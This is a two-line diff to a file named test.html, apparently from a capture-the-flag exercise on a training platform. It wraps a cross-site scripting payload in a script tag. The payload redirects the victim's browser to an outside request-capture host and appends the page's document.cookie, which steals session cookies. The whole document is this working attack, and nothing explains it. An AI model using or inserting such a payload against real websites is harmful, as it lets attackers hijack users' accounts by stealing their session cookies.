--- a/test.html
+++ b/test.html
@@ -1,1 +1,1 @@
-location.href="https://oyhpcna.request.dreamhack.games/"+document.cookie
+<script>location.href="https://eciucsr.request.dreamhack.games/"+document.cookie</script>
